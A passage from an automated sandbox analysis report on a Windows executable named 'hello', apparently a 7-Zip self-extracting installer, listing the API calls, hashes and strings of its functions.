                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                        • String ID:
                                        • API String ID: 747815384-0
                                        • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                        • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                        • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                        • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                        • LoadIconW.USER32(00000000), ref: 00407D33
                                        • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                        • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                        • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                        • LoadImageW.USER32(00000000), ref: 00407D54
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                        • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                        • GetWindow.USER32(?,00000005), ref: 00407E76
                                        • GetWindow.USER32(?,00000005), ref: 00407E92
                                        • GetWindow.USER32(?,00000005), ref: 00407EAA
                                        • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                        • LoadIconW.USER32(00000000), ref: 00407F0D
                                        • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                        • SendMessageW.USER32(00000000), ref: 00407F2F
                                          • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                          • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                          • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                          • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                        • String ID:
                                        • API String ID: 1889686859-0
                                        • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                        • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                        • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                        • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                        APIs
                                        • GetParent.USER32(?), ref: 00406F45
                                        • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                        • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                        • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                        • GetWindowDC.USER32(?), ref: 00406FAA
                                        • GetWindowRect.USER32(?,?), ref: 00406FB7
                                        • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                        • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                        • String ID:
                                        • API String ID: 2586545124-0
                                        • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                        • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                        • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                        • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                        APIs
                                        • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                        • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                        • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                        • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                        • GetDlgItem.USER32(?,?), ref: 004067CC
                                        • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                        • GetDlgItem.USER32(?,?), ref: 004067DD
                                        • SetFocus.USER32(00000000,?,000004B4,771B0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$Focus
                                        • String ID:
                                        • API String ID: 3946207451-0
                                        • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                        • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                        • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                        • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID: IA$IA$IA$IA$IA$IA
                                        • API String ID: 613200358-3743982587
                                        • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                        • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                        • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                        • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                        • API String ID: 613200358-994561823
                                        • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                        • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                        • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                        • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                        APIs
                                        • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                        • GetDC.USER32(00000000), ref: 00406DFB
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                        • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                        • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                        • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                        • String ID:
                                        • API String ID: 2693764856-0
                                        • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                        • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                        • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                        • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                        APIs
                                        • GetDC.USER32(?), ref: 0040696E
                                        • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                        • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                        • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                        • SelectObject.GDI32(?,?), ref: 004069B8
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                        • SelectObject.GDI32(?,?), ref: 004069F9
                                        • ReleaseDC.USER32(?,?), ref: 00406A08
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                        • String ID:
                                        • API String ID: 2466489532-0
                                        • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                        • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                        • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                        • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                        • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                        • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                        • wsprintfW.USER32 ref: 00407BBB
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                        • String ID: %d%%
                                        • API String ID: 3753976982-1518462796
                                        • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                        • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                        • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                        • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                        APIs
                                        • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                          • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$CharUpper$lstrlen
                                        • String ID: hAA
                                        • API String ID: 2587799592-1362906312
                                        • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                        • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                        • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                        • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                          • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                          • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                          • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                          • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                        • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                        • API String ID: 4038993085-2279431206
                                        • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                        • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                        • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                        • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                        APIs
                                        • EndDialog.USER32(?,00000000), ref: 00407579
                                        • KillTimer.USER32(?,00000001), ref: 0040758A
                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                        • SuspendThread.KERNEL32(0000028C), ref: 004075CD
                                        • ResumeThread.KERNEL32(0000028C), ref: 004075EA
                                        • EndDialog.USER32(?,00000000), ref: 0040760C
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: DialogThreadTimer$KillResumeSuspend
                                        • String ID:
                                        • API String ID: 4151135813-0
                                        • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                        • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                        • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                        • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                          • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                        • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                        • wsprintfA.USER32 ref: 00404EBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$wsprintf
                                        • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                        • API String ID: 2704270482-1550708412
                                        • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                        • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                        • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                        • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                        • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                        • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID: %%T/$%%T\
                                        • API String ID: 613200358-2679640699
                                        • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                        • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                        • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                        • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                        • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID: %%S/$%%S\
                                        • API String ID: 613200358-358529586
                                        • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
